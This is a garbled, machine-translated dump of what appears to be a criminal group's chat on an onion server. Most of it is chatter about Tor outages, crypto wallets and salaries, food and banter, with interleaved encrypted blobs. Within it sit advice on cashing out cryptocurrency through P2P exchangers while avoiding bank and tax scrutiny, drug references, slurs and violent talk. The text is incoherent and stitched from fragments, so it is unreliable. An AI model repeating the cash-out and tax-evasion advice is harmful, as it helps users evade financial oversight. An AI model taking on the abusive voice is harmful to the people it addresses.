сюдаtestdemetriuseyJhbGciOiJBMcikrn9CLRPQxUCNRhijA5Y/3ywkCCR68mjEe/zIldgEpkyAWf8vu5tllVVIA/cb+l3h06YySFLjkcw55KwgDTiuM1WdaeLG+s5oj/JLa3BnqyHIu4eZ5E3hEUJVkAcIiOM9hpcdN6vbGkmbPcsYV6chaxvgVycduxIug1NjE9UaZNJGf1b5CNtWvfyMWxM+eyJhbGciOiJB/z0QOVhTQTr2YBy8OPOlThFwS7qcSkVoVM/ffghip5zfSepiZbPNN5p7peyxggFQRRAD8CZ1paiVcj66oVbYSvW/fq3gqDNsn8/wSiMcIlzLxROFSvlAv3CBGzUkvgeIdlRD+UfYLwN1CxV9Cvxsi2IQ9EsOPFXIw38hjqhvqyINTWiHmqOi+i79izffAy3J1j61bZk33M4InXXbXwNXky3u3oIplZk7Cq0/X9Q65ArptsOC+A5ardjGavgl820Q0hOKH086Bv4v/QrTPzLw/vv03+toF2f2dyQQ3jAXJFmjb0h7wrR61yx+Nc+s9JIcvIiQJPzC3CxF7KHyphbFJAdlzR6VwZexNT6aU4HHgXBa6Z+LmKFRrDIqPfKqg548iAIL9N3Eq4uaK4/2BZTfV0GPHGm8VZbuhRga0arteCUp9sM6tFRiXdGjuEGIfQJGF72ieQjIsS+lZTC3WE8zpinZ9ckx+WMzXy3k3zv1GbR+pMYYhTww61h9dAlE/jZn75CkjU0TOtjf3I8MKp4pjm5C+LGKpemhmrclJxZon7sanOQk91ew6z5vYxeyB8WB6xUs+q6OtsK/9CGddRlY1+76CWUAtanLb0uY7cXGHA4lQ8lthfT4HGKyJ+kGNc7+Ut08NhhU714/Z6gPjQpWTZ7GdeXwFdSFGoNKQNd/+/NwSMq8PJ+/3G1Sn7T2nlLLzGBLhLgjiMp94PmFJisSYA==eyJhbGciOiJBiRp7TNd+UoyWOrH3ZoUGDLhqkxnIj+xaPv6sQsM7WAkc2+J Now you can see that the Tupino government is in cahoots with the americans and follows all their orders.It's not like they were storing cryptocurrency on blockchain.com wallet like suckers. Cryptocurrency is likely to be banned, up to and including criminal prosecution, but thanks to who? Revil thank those guys who were smart enough to withdraw money and store it in a warehouse in their apartment, and now we have another headache to withdraw our money in real. Bystrykin sat back and thought, "Well, he thinks these are delitans, but there are non-delitans, and he seems to be afraid to imagine what's going on. =) the news is that carders and shop owners unicc@kermit you know everything, but who is The Infraud Organization and they took them? I like you like that too. нравишьсяeyJhbGciOiJBEVhgDlxhs3PKtyNdKDId5GyzLACLZHNKtgjkKeob1ko5cZY8ZAWOONrs8l2ajcne/oozgib2Zkb7QuVsbEhEkR2hGzY8UdQbVJhHtU4tUf3lt7M8FUiEf8k7AmPJ1Bwg6HVFKDaIdArwmFLijU3/RK/mZx8TVcIOWsMNZRbCRRQiYBtHe5/kV9cvQAUe9gl8eyJhbGciOiJBDFa/VDPiRKeA5TjNAsi8/XoADWuIuHAClH/5pDlNE/VyUQfs/oN+31IvkGWLth7Kh+Oh9trSyED63JyiBXYXHgrEmq/T9px0qkFNGMxlRqP3Bekcnxs7CneXjXdUwSWPHdrTV6GK9L42x4JRzXz/RRrtfCHQMNtPuiN8ZjH+IEP9eBHG2+t5N/py1QlgOsStNpdMBy+sfC0zbzCfLljH6cOd8MZnQNucguv3PwfRaW7DPI79Hpf1eU4hAPS1YYyrRSrGEsmNQM02nICd9wD1DgocsIBR4eNYSGg4cnRhh3UX5gDzawTpQmS+NhqMjT83W0DmhZLEaodJrFrfzWqQ62lDgO7Le0hMb3bfwHrP++yNVWx+uX0sKMR3QbDwr1SITqz2c4QMltOqSZ+2R59HTocer+sd+z3NnOZzdORt9ui2vH8OBRQlAxefj6s98Eb0IRZIlKhXl7gQQMVfaglBSGMt+hcYZUCSvjT/yS+CP/0ca8uGQxxT+MlrfcBOtmknLTLn8dHAs4Bj2r5Pn55YMKjzesiEyZnfF7V28Ko+npgVK78w9ZuM2b3pCWLRO9G2tCriKLWhJjVux7SPOn2n7YEyn+xl6MimAuOLxz7i2onnphwSZFZlImLowhZNUHDPjY/kHglk+sQrLp7BGP8uK171iJBiU2OsQjy+48q181I=eyJhbGciOiJB7RgfgsCEbQiz9ZwCLwVTWscUyU5HaSCEoYWoItcTU3V4x2qeGq09hvUWVz95IXaMh+cGbIL7hMnr5+i92u7W9sB5dVnZQ2 Merry Christmas to the Orthodox !thx)pongping Merry Christmas !
Here we go
Here we go again, I think it's a little bit like a hooch from the dash?)yo, man! Mutual broWe all have a good weekend! Write to the sports lottery :) I will complain about Torping`https://mb5fbvx72fbod2hkirfecc5nh7lwq6ke7xocn7j2u7raiwbytvevpbad.onion/` this git I do not breathe - Onion-site does not find the git visible noda is showing off (nothing just no connection502? like git again laid down? `https://youtu.be/NungW24Z5Eg` Ta, noooooo. I don't. call tech support, what the fuck they do there! It's too tight (nromI'm fine. It's fucked up how it works. Does it work for everyone? I get it every once in a while. Finally, it's true. Dincek came alive. I've already told you, you can "play around" with itTry to play with the parameters of the torus. This might speed it up.
For example, in torrc:
excludenodes {us},{br},{jp},{ca},{au},{cn}nu all toad does not quack/crocodile is not caught) `https://youtu.be/A5rOxIfY4Us` write a collective complaint to Putin)Communication breaks, write not vohmozhno normal, in admins +- goes the same, but the most stares Rocket week already tor brain ipetBut how exactly in console do it, even I do not know. I change in the tor browser from the menuA how do you get the active chain in the console? I did not look. I'll test the sert and chain sometime at my leisure. Maybe the browser also contributes to these bugs.And watched the certificate itself, the print is the same? I did not test the change of chain, but when you reload the page sometimes gives a request to update the certificateA when you manually reload the tab, change tor chain? I have the same happens, can not restore itself, then I just change the chain without refreshing the page and the connection is restored (and otr does not go down).According to my observations, rocket can not restore the connection by itself, there is a jam. It is necessary to manually reload.It would be necessary to see the sorts of torus, maybe a bug somewhere ...At least I have soJaba also floats. It takes a long time for messages to go / come, then does not quiver at all. But not so noticeable, probably because the client does not panic, and waits for the restoration of the connection silently. If there is no connection, it stops squawking. It's not the rocket, it's the tor network itself which is unstable. I need to reboot, and sometimes to recreate a tab in the browser. say all Rocket is not stable? a week already torment me loose connectionvirustotal also do not vjobyvayut?)At lockdown, when even dincheck does not work, it would be very helpful@rags, and how are we doing with the farm? (Who will fix it? :sweat_smile: )Yes, it really does not work.yep, the ping goes and 504 Gateway Time-out - .COM in fact Hello, all. Dyncheck isn't loading today...{ "$binary":"ilUaPFD0ZjLW+jijoHA3IKQM7CBNEkTeTT3pSAgfHl5MNpJO5anprXeP58r9c5ngPLdGKvNSr5+OUDjcX1xssVnd8awmQkgaMgN4+Jdtekh4LZvCMo7k4yql4X545L0ZvrnbmXVw2oYyEvBO/c3cq50PSP75Ad0vGKH5fXskCRBScioNFDdCgTgOj1eifGaK1RwQMFOMDIvQ6ExMtwXgoBY9BriOCyUIIlwRlmglNtKssXi/3gSDdQ1dCr5hBrE3sptI5xcdQD3jVd2ShHe00tnmBU7u5Sb780U6LW2oUtxVyg/cBF3/HaJe3e78OqwmQJNlLDiVbe8PWGLKS8rXK9zR0oH5"}{"$binary":"A6FsmTAgVuaXFmXzwSSMjq10gvIBOhlSc8HBuenJIu2QXMEr4UwEtzSbNOrR4b+Fuip2Zv2g2uOF2FSGdn5QmJkN5FNWTncL7gW8Rqoi/CUabFv3GYjlr0fKRTGRISZ+Sp0/WrpLjxgl/Hcshim+cf6UShavMDoqaw7iroI7kGQ1L+xZ+gWW2altNBT91jVgU9d+c+ED95hjW8ulC+RjHguapeqHLVFwq7qpa7dQRI2jzM2eNeD0PtN2fm/vcqWo50rwK3EoYx1XaQ=="}{"$binary":"fKbBRoIFEbrFdL8ERM9dhGmgptEfQVvcTWkHNf/uOjuv7cZo45CM0fZR5ULlgvTC5xrxXtzj9Y1Bmu2q5+xMWPZ9zKiz/sPmLq0GWaBx9tL7or02bG87JyhzjJov0ETcek2HSYv5Zh5vuz0gmjbe2D0Vm+6KEH3xz1xKwuK40sTSkB4RzPerDGBDvAWFPmagznMjXgi0cx6AmOT2NcgJZ5J2NWms85HlKkkUg2un+E6K1VYF6IaiVqQw7N5rbnY3y/08YwVWfen+NA8EQGN9JzroQN/nog8KvO2vhfMObmBm9g=="}{"$binary":"7s3QulPAOT103mXHXp8DBafpNaXslKljk1MyRakofLgsSCaKa9ix0XYEE7bv2j+IuAnFy0a55uQWJ/TulxbwNuWxGL4ltmkzCAW6mqZKeCdR70hoHkvRUGqPe2scP5oKQaCzeurPktFoZFVH8vwomCg+zyEwo27iZtqZptzJ7LzFnTM94CFsIalpOCdumQhLtUDIQXowqi0K+7yyC67K8zrvi6Mx0CEpV1m1Wh4UIIoL8pQhCkbk8GBSeNhZQVPzGbnGClRIhWdXZqVgERvmGpsEmlfKL7Z+TvKlQiSw/TREjsGN6C2/4jnLGLBgHGU="}{"$binary":"eZPiD38KqMothh8tZuAcyWFyCx8sabvWsB2bkvRx06wQP/g2WPZ/S8uy9luEpp1NgdYnRTn7/YDxRO19wGPX/5cVDxIC4t5dinCmo13l0pEi0FMMubpbo84x4KE5OQnBXq7kut39M9HuhENm87hMrzwPbTywbnOsEip7bbysqLRMqRmxGTo4Tey1e/WjeH1ijuY010Rfvml8zIWsJTAAyvvMM9vSgqqAsYRk9gzxX5mGloceEOSgtOwO8jqD4Q2ioEtuChPqmCxoZiL413bGpEDN/laDgWSphAlPUZ+KDL6FVq3P9ImM11CvGCoQL+SEDNshyh36AA6CBCMtxMG2+6OVS2ETACVOqusvw2s+lfx1lomLPYrz5YjUZ8mlyRONDalW6Z0B+z8Kiw=="}eyJhbGciOiJBVALKtE5Lkh92q3gn6QhtxkJxFmuy6JH6EXa3O2eiIPfiKBYrY9kVE+dQz6vE3TJRKfwmFlmY3NdiiKfx/ECcLqVO23Ra+7csjIK6vAHbhEzLvDpV45qgcjL3G0i2uoWwUikZRry6gTxxynO7vJf+q0SfKkR3FDokOqXRFox6o+gMV8tc7iKd4arKIqbUJ/oNnLlxruUh/6mdelCSARs0qMKDnPje2Gxul63LMjS8Q8C9SD3ybqtqFDL9IPNIt0dzEIMyVlM4RnYp4526mejNGQ==eyJhbGciOiJBrjdbXjZc6d50rluQP9GlZXjqVdiGD89oNZVyhalUhQ4a0fJLWm981QZOzN+GH+Uf5PlBchGJYC+59HbVS56CPIdc3YlnY5qP3Rv4qDEtcsaqA1vrqrrMUH6xtR7gXjyODLRI/YiZEvY5Jj+/1eLI7fsjgfY77LM0hI12mHlfgLHLPvuWlvJo861OW4XiZ5YJacSEfZHTREPnxzcAF52Hhi/AqbXE8mCjLO/Iu1lXxsz5YOXG+O1mc+PB/kFkgSrQСтранно... I'll restart the tor thenprivet, GITaic is floating fine)@all Hi and have a good day. Git starts the day with errors again.422There's no such a feature16,1,2Looked in your@all guys, and in vmvar you can do snapshots on a timer or scheduled? @hector hello)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=JawoYyTu4evL6yYy4) how much more can you) stop chewingzp did not fly through ?hey everybody, don't read it or don't read everything) was there anything interesting? @angelo you're here againpfff, we haven't finished 1Kebat 530 new messages since yesterday what for? Vovkamnuzhanu for 45 it's already passed the 39th bit
It's ok, let's wait)) We are not here for that)) or just the old timer?) to play sapper) but anyway, I'm glad not yet given out nothing lostVerboy nekst dormorski fight can arrange, as an option, 16-rich dominoes[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=BkMLTDoLRZzE8hucM) ⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠛⢉⢉⠉⠉⠻⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⣿⠟⠠⡰⣕⣗⣷⣧⣀⣅⠘⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⣿⠃⣠⣳⣟⣿⣿⣷⣿⡿⣜⠄⣿⣿⣿⣿⣿
⣿⣿⣿⣿⡿⠁⠄⣳⢷⣿⣿⣿⣿⡿⣝⠖⠄⣿⣿⣿⣿⣿
⣿⣿⣿⣿⠃⠄⢢⡹⣿⢷⣯⢿⢷⡫⣗⠍⢰⣿⣿⣿⣿⣿
⣿⣿⣿⡏⢀⢄⠤⣁⠋⠿⣗⣟⡯⡏⢎⠁⢸⣿⣿⣿⣿⣿
⣿⣿⣿⠄⢔⢕⣯⣿⣿⡲⡤⡄⡤⠄⡀⢠⣿⣿⣿⣿⣿⣿
⣿⣿⠇⠠⡳⣯⣿⣿⣾⢵⣫⢎⢎⠆⢀⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠄⢨⣫⣿⣿⡿⣿⣻⢎⡗⡕⡅⢸⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠄⢜⢾⣾⣿⣿⣟⣗⢯⡪⡳⡀⢸⣿⣿⣿⣿⣿⣿⣿
⣿⣿⠄⢸⢽⣿⣷⣿⣻⡮⡧⡳⡱⡁⢸⣿⣿⣿⣿⣿⣿⣿
⣿⣿⡄⢨⣻⣽⣿⣟⣿⣞⣗⡽⡸⡐⢸⣿⣿⣿⣿⣿⣿⣿
⣿⣿⡇⢀⢗⣿⣿⣿⣿⡿⣞⡵⡣⣊⢸⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⡀⡣⣗⣿⣿⣿⣿⣯⡯⡺⣼⠎⣿⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣧⠐⡵⣻⣟⣯⣿⣷⣟⣝⢞⡿⢹⣿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⡆⢘⡺⣽⢿⣻⣿⣗⡷⣹⢩⢃⢿⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣷⠄⠪⣯⣟⣿⢯⣿⣻⣜⢎⢆⠜⣿⣿⣿⣿⣿
⣿⣿⣿⣿⣿⡆⠄⢣⣻⣽⣿⣿⣟⣾⡮⡺⡸⠸⣿⣿⣿⣿
⣿⣿⡿⠛⠉⠁⠄⢕⡳⣽⡾⣿⢽⣯⡿⣮⢚⣅⠹⣿⣿⣿
⡿⠋⠄⠄⠄⠄⢀⠒⠝⣞⢿⡿⣿⣽⢿⡽⣧⣳⡅⠌⠻⣿
⠁COPY00@hector email)tell you, i also want to tell you. i was thinking the same thing with the saltikpiks what you send in private to each other i'm afraid to ask.I have to run away, I'll be there in a few hours Get well!get well get well get well! hello, i'm sick. i'll be tomorrow from 2 pm after the detention of revilovs otshey kopecks et ovshey only from the Kwon department one polkan 20 found 6 lakhs`https://yandex.ru/news/story/SBinance_vyveli_bolee_6_mlrd_rub._posle_idei_CB_zapretit_kriptovalyutu--637360fa16ca2dda8388e7756b66e066?lang=ru&rubric=index&fan=1&stid=ks4auh6sB-g-KsMsvxl8&t=1642705102&persistent_id=177779698`)))damn, I should write a book, I have an idea already bookmarks will do in the woods with flash drives containing kopites, It's a question of time to input, to withdraw, to store, not to transfer, to view, and so on from all sides, to see the flows and draw conclusions, and tax them to replenish the treasury, that's reasonable and more profitable for them. Most likely, fsb understand and see the flows of crypto. But for volumes and transfers in general, they can fuck up Tink does not block even for alimony accounts, so let's pray for Tink.
P2P and online exchangers! How will banks know if the transfer is for crypto?

If you exchange your crypto through P2P, for example on the Binance exchange or through any online exchanger, you receive funds from individuals and, as a rule, there is no marking that it is money for cryptocurrency.

So it all depends on the particular bank whose card you accept such payments. Some banks are more meticulous about tracking such receipts, and some are less so.

Much depends on the regularity of transfers and their volume. If you occasionally accept small payments on your card, most likely there will be no questions to you either from bank or tax office.
``````
How will the tax authorities know that the transfer was for crypto? The card just received money from another person's card! Maybe my debt was returned to me, it is not necessarily the sale of crypto?

As a rule, banks report to the tax authorities and Rosfinmonitoring on large transactions. If these transactions are systematic, they attract attention. When additional attention is called, we get blocked under Article 115-FZ, that is, it is a question of the volume and systematic nature of these transactions.

Accordingly, the data that you will submit to the bank as a business case, within the 115-FZ may prove to the tax authorities.
Twenty to thirty million dollars a year for a small company is the norm, if you pay fines - in short, it's fantastic they do not want to pay taxes themselves, it's their bread and butter, they change details small Ipshniks and OOOs charge by cardwhy do you ask?html `maybe just the percentage will go upa I think so far it will remain soa so from 2018 you have to pay 13%, there is just no control, but this is a new topic, as from 2021 January tightened If there is someone who is trained in this topic, share your information, we will all thank you )))) but this is another topic, I am interested in withdrawal through exchangers but you get under expense control, automatic ones are rare for me, usually manual transfers you always clean the breakwaterthere is also a topicmetnii in moscow city exchangers automatic from whom to ask?I'd rather take it out to the cache and give it to charitydolgprosyI want to understand, calculate the risks, so to speak, you do not cash out through white exchangers that, for example, cooperate with Binance, these exchangers are essentially physical persons cashing out how? crypto cashing out is taxed at 13% is income`https://pravoved.ru/question/3137767/`t there legally selling it on the exchange you are wrong thinking you are wrong, just withdrawal through the exchange is a sale, or am I mistaken?fuck this happiness if the tax office fines me for the turnover on my cards - i won't have enough years to pay for the rest, otherwise i'll be fucked, then you need proof or are you a self-employed miner?It's not about selling it, selling crypto is legal, you can sell it + transactions between physical persons, it's unjust enrichment, transferring crypto is not like personal income tax, shut up and imagine, all you took out in the last three years will be taxed at 40% and I will send you a payment receipt. I don't know how to pay 13% because they don't give a fuck every year more and more control I've never heard about taxation for transfers (and I don't want to).I've never seen copying these transfersI generally tax authorities clearly paletize transfers through the rapid payments system, so exchangers sometimes write them off - debt, charityWith exchangersGuide how not to fall for payment of personal income tax from crypto, which is displayed on bank cards.
By law you have to pay 13% personal income tax on the sale of crypto, that's in theory. But how in practice?
Do the tax authorities really see all these transactions? I don't know, I've seen ads on Hss...I used it last time, about half a year ago. If garlic*benny already requires Payeer verification? I don't know, it's really weird...buy some cookies, refill them and all.Isn't it weird to buy Benny?.saw on sale once, already with payeer verif)[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=MYiobFQjvwKFMyw79) By the way, Payeer not bad wallet. There are basic types of crypto, rubles/dollars/euros, built-in exchanger of it all. Withdrawal limit is $999 (a year ago it was $2000). This is without verification. Compared to kiwi and yandex-many normal limit (not 15000 p) was possible to order the card from this rocket at that moment, I mean webmani)mmm 2012 =)for such their horse interest in general is supposed to be shotenovat themselves read in the description =)https://www.microsoft.com/en-us/p/%D0%A0%D0%BE%D0%BA%D0%B5%D1%82%D0%B1%D0%B0%D0%BD%D0%BA/9nblggh0b63g?activetab=pivot:overviewtabbylo they have it in the ads, but that something did not work))) yup, catch up and put it againhttp://www.rbc.ru/rbcfreenews/60061c2e9a79476d85e19139сейчас googled like stalled webmoney in the old days, she worked with him:Dtam 10% seem to add to the account at the end of the month if the money lying :D =) from roketchat in roketbank? =)To visapotom somehow closed itI remember it was instant withdrawal to cards, transferswmr where can I withdraw? Withdraw wmxWithdraw wmr then instant withdraw wmrRemember the time when they sent instant money transfersNo withdrawal, pay 70 to btk koshOny generally gone crazy) 24 hours to withdraw....There are 24 hours to withdrawalAh they threw not urgentlynado was 70 bucks in crypto urgently to throw, asked 90 da wmx in general yank on the terribleThey have there cryptocurrency wallets (wmx), works... But the percentage is only a large for everything... There at 15-20% or more you can get with their exchanges/withdrawals as it turned out they are sometimes necessary So webmani under the hood.
Although Western Union and Golden Pay transfers are interesting as long as they are not pigeons, Webmani has an interesting model of money turnover. It works through assignment of the right of demand.
Will we get crypto through cession of rights of demanda Hello webmaniWe will buy crypto for virtual moneyTax cryptocurrency is already banned, cryptoassets are allowed:disappointed:`CB also offers to block transactions for buying and selling cryptocurrencies for real money`https://www.bfm.ru/news/491066 `daba which desktop 'Psi'? They changed the address or what?'better in the toad' my toad stopped working in KazakhstanInternet stopped cutting off likeNow bitcoin is growing? :) he's from textiles, lol> moscow, lublino, we work
You're a neighbor of shila from bloodstock:)Elm street, 666 ahadom kefirau street miradom kolotushkina Pushkina streetMoscow, lublino, work cash on the spot give me tea, come, why not in vk@frances, send me plz link to your profile in the toadMaybe start, better to the toadHello to all friends!So that's right @frances you're here with good news?Me and the bot are carifiers@angelo your prayers have come true and we are there because we eat9 out of 10 people don't give a shit what to eat soon people will become dumb, fish has become expensive here so it depends on the region4-5 kgsemguya for 650 berupizdetsoni really cost like a plane even kamchatka crabs have sea delicacies here our specialty store 1080 for kg has gone over a thousand kgGomer what price?we don't have ice rinks either) the main thing is not to look for it at the rink, like in Jumble) for me, it's just a matter of finding ice) there are salmon carcasses of 6-7 kg, and they would be glad to say "goodbye, you fucking ichthyander", but it's not polite) just like in the summer, though they live very well, In winter, I go fishing in the store in winter. They never fucking learn how to do it, they drown themselves and their cars, they want so much fish, there's a video on YouTube, the ice is breaking right under the fishermen, but the most stubborn sit and wait for a nibble, and every year the same guys get carried away on the ice together with their cars[ ](https//xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=9KhR4QrY6yon27ofB) ahaha) well you try) under the ice fishing in winter fishing is important not to become a bait pod salts you can do just underwater hunting[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=S4q7FCBmvmGWzX8d4) here majors, I think chistagans cook dumplings or macaroni sweat..... ``https://podlednik.ru/lovlya_zimoj/rybalka/zimnyaya-rybalka-dlya-nachinayushhih ``aha, he left to take a loan we hope now franses will come and multiply the bread and fish, and everyone will have enough>develop hunting and fishing skills
i've already started to look at the backyard cats, do i have to eat them for a week? if i buy a double big tasty now, i'll be out of food tomorrow you need to save money. if i were you, i'd buy a doshirakurrrrd double big tasty! I'll go to the mac. I'll buy a couple of cheeses and you won't sleep at night. It's food and energy. She likes mephedrone, she likes mephedrone. And in my yard, there's a girl with a rack. And I'm so in love with her, and I'm so in love with her.regular salt, like meth@Garfield ate the cat already? better to clarify the fuck you, jocks, know)what about the other one)yeah I get it)enough about the other salt on it steaks cocksucker I would not give
It depends on what kind of salt) Good idea, I should go to a neighboring housexxz, I used to be able to go to a random apartment in the neighborhood and ask for anything, saying I was a neighbor - they always gave it to me. Now it's fag on fag on fag Who goes to a neighbor to ask for salt?) You're right they will)) Yeah, and my death is in the egg[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=BfESJocuQ4De5PFoq) Your life is in the hands of the Franz as long as I'm alive - there's hope and they'll fuck you up. Now you go and ask your neighbors for salt. As long as we live like slaves and survive the world will not get any kinder Respect is built only on the basis of mutual respect, women not to beat, old people to respect. I don't mean my grandfather, but as an example Fuck him, what the fuck? i should respect him? Fucking drunkard let's say grandpa is 60 years old. i broke this stereotype in myself a long time ago. i don't know why time will come and how many former whores will be grandmothers. why the fuck do people have confidence that old age equals wisdom, kindness, education. grandpa once walked down the street, and i met him. i just walked without doing anything he just took me and fucked up his face. well i dodged. he did not say a word and went on to stop the words - stop me, you anger Satan:) maybe even a dumbbell there is just a trick, who repeatedly that without a queue they have in their bags 40-50 pounds of what nity and beer-pumped beer too?it will not stop the bubkas, believe me, it was scary to look at me then. i weigh 93 kg and pumped up. i'm not proud of it, but it was nice, i once said that without queuing .... i took the sin on my soul, i had to tell everyone to fuck off. honestly, was it scary?No, I went in silently and sat down right there. Did you break the second limb? I said, sorry guys, I didn't have to wait in line. I remember I went to the surgeon to check the stitches (c) The grandma from the queue just to ask, I didn't have an appointment, give your father a break and when will he be back?:joy:Can I bury a dead man yourself? Let's just say it's better for a living person not to be near me. Are you even alive? We will be when the State of Moscow appears on the planet. It's not Biden who beat us, Biden beat us. Have they updated the resume yet? It's been a long time since your wife left you a lover[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=Xm3kaW9jmYWCzDqQY) what do you have there bomzhi bomzhi still in the freezerDa try to call @frances like rain in the desert, bomzhi Kermitovskaya usladako me pigeons fly by themselvesti expression "make a bum" will play new colorsa whores? then on bomzhi[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=D3duxjMF2fvs3op4Y) then go to the sparrow and not infinite they are as the great D said, hang on. soon the neighbors will already look at my passion for pigeons[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=eEE9RbrwczTScGq745) there, hang in there, or hang in thereDon't have money, but you hang in thereSalam in halvesI mean, I don't knowwhat's better, I can't say maybe some Coinomi will do (it's multicurrency)@ruben , you surely can recommend something for Ether...guys, what wallets for _Ethereum_ do you give preference to? mine wants to build a chinese wall in my house with it.... 100 times regretted that you bought a three-ten converted to 2-kusytsuki such i himself last summer sheathed the garage, the sheet osb cost ~ 1.5k, then when I did, the price fell to 1.1Her will understand really with these prices of building materialsinflationPogodi that whether more will be yesterday Ytong gas concrete rose in price from 7950 to 9100.
This material should be cheaper in winter, not more expensive... Hello, everyone! Who hasn't received a salary yet - send me the address of the wallet in my personal account@allPerl/Scala/Go/Lua
all with knowledge of these languages in my personal, now) nocturnal admin, but who's to blame...eyJhbGciOiJBcMD1fZkdl2QAsELKXq7ZZk3efqKUhsgiADc+tx8muT/gnxIxodM7mVhcOsCZmWS96Wvb4BxbK3d4owSEV6KNsaB4buG7MOtMA+nX5JGuhpkTn7FWCrVVUb7vXD7rH78OVebI76oeXza3xdFTTtsMoCZsawXG/NRIxU4GTRL+sd9phctXsg2aYs2wPGQQjIMceyJhbGciOiJBbPeAoJjx4q/FJhW6VK3VqD3a1Zbt0W3o+5JyCv72JDuMPPd3B1msX2BFoiVlS2Jmsoqb3xp4rSloc7jYIMwG1UFGFMRh2lRT+QOoQmV1QkEtgn1e7yt/3QTD9FjHcOgJSyszdPbLetbLyZ4TPINwQf2FM/AAMU9Et/ZAcH0vifMeIN6gz3EYfk4rnwSPqqnFnie5v8Kfs76EwCGg4HlGcr3jPMrQk2iuYurgYK51qZoKzwT4/kVkJsWzIxxjVJ7LrbG0Hi2RJ8YZBLdwJy4jOD8G32bsLGu+8gdautUo/4mlVZ5YTCUUGxaQdshvMUR4bi3GXXLyAG+A9uCLm3RogdI/FstBuYXnu7N3a9LIOR7Ou6RgNIyAH26tb+gLr5v6wU8vUr8Kx2qv7U6rLQohT9580S/5S1oT6DhFhtL9VyqYit6WjoFXGpV/4AuWGISQFwDDTdSdaDQVrZQlg7qJQcFYAUZUBJkp8XAIcpTiaxKQl1oG9g/PtUMqjYYu//K5D1Lj9eCW7cebMHmgWdGX1fEy5Z2MBsUQWEZnWMQdct/E4ToUrDI8SnIgrHQviMba4NHvBqlk/4hQel+y/CSmNKGnnHHLWogtSQDoQMtnSL8=eyJhbGciOiJBJeVWjR/j4HLyKkUMkdeaQcxYnsOp6h++EgFKDhX/Y3T/p7I/n8lCc7v1ej1naz4hYOvqWrB89S+Q9+DX/DN7Je7Trh7SYD6tix9pZsVq9xyu/zu7lPPPQQe/d0/g9BMm0PzR1xRA/2FfBImU6MSz5eEy8gvgPLl8j+ypp5n8u5Y=по Who's the "stand up men" here and who tripped us? Volochkova??? Nothing, I learned how to fill the empty space in my stomach with water.
mushrooms, bacon and fried cabbage
I won't be long, @angelo20.21 will do, don't major, keep your letters, I've hated your numbers in my private affairs since I was a kid, we can draw 282 just like that, I don't need any article, what do you need, again part 2 article 187? Do you need an article about cyber samurai?They did not detain Jigarkhian and Sookoshvili?) Like the "Robin Hood" girl - she took from the rich and gave to the poor. You like to intrigue. How do they give? Right, there monkeys are delicious and giving:joy:There is enough work to do.
https://www.securitylab.ru/news/529580.php
```
everything is shit except mochiparni and tox is as shit as it was or is it better?it's sad....oh don't make fun of me like that!!!!! it's a joke, there will be no more zpDa it would be cool to share...norm you didn't share 32? you're already in the black and you're in the black) put it on 50 Cool! How long have you been standing? agent 47? they're better off playing ninja turtles) we have a strong male friendship without your bullshit games... what's that? angel in a cockerel? ahahaloloslubstvennyi da they have a romance i love you!you're too fucked up, you're too fucked up, it's like you haven't eaten any living shit yourself, well after that there's nothing to add, the weirdest thing is live spiders, these faggots try to get out by the throat, you need a drink, i remember eating cockroaches in a deep fryer, you probably ate them already, I will survive cockroaches@angelo zhivine fit) well, then you still have to get up from the couch project "mad drying" you all are handsome <3 no negativity guys, did not want to offend nunu also theme ok so dry up until what da IT guys all fat@angelo ping or until someone dies from hunger))) judging by the wait to 100kagan probably the leadership is waiting, until a little grow ;)As always, before the issuance of wages the bit goes upDon't be bitter, one way or another a new window of probability will open.:`(Well, then I will lose a lot and put up with it.As long as the playful moodPoem I no longer want to))))))))If you want.Absolutely. And talk, and kiss, but - later.Just do not tell anyone And kiss? And talk?) All, do not fool around.What to wish for.... Guys, thank you very much, I withdrew my question.Ni-nothing.Or nicks? you have a tor ekspert? so look what's in the logsI supposedly tor is not working.[ ](https://xflemdsxjrjilw34dsxpvrxp5whnaut7hc5xejwuqs6eqrkt77bxkwid.onion/channel/general?msg=NYAZoZWoXynNsoXjB) Christmas miracleNo. thanks, but definitely not.Different chains for tor. Different programs. tor browser and explorer bundle are different exemplars, different behavior. One works, the other doesn't.
I have the same problem myself, but my chat is constantly dropping off and the browser starts up for 2 hoursCHANGING the ceiling....A. how. Я. Here. Turned up? Yeah, that's a lot. But still, it must have been the torus. I suspect it's a lot. I have no idea. Toad got sucked in while I was texting you. It took 37 minutes to connect. What was the problem? It wasn't the torus. Yeah, thanks. Now it works.Angelo eat anything that can moveAll check the pulse)Funny.Eaten.... Toad.....@brent check tor-connection worksToad worksLaughing together? I can't get in. I'm not an asshole frenchmanDickhead. I'm not joking here! toad good, toad delicious, we're talking about food right?! I can not get in 27 minutes.norm (me)Friends, what's with the toad? Also remember the "designer red" so you can make visual masterpieces from food that bums all eaten, seniors entrance locked in 5 locks?) terrible movieblin, I somehow ovmoblennym movie Tusk ostavlyayut find out how to do it all you can sharpen anything, even the banister from the entranceAha.there was a man with a black hole instead of stomachFilm remember freeway 60 holodets 